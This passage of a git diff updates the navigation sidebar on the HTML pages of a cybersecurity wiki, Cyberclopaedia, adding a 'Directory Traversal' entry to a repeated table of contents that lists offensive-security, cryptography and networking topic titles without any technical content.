        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -181,22 +181,6 @@

Loading a B - - diff --git a/docs/Reverse Engineering/index.html b/docs/Reverse Engineering/index.html index 1c2a4506..717ba0e9 100644 --- a/docs/Reverse Engineering/index.html +++ b/docs/Reverse Engineering/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Rever - - diff --git a/docs/System Internals/Linux/Command Line.html b/docs/System Internals/Linux/Command Line.html index f8bd4160..410440e6 100644 --- a/docs/System Internals/Linux/Command Line.html +++ b/docs/System Internals/Linux/Command Line.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
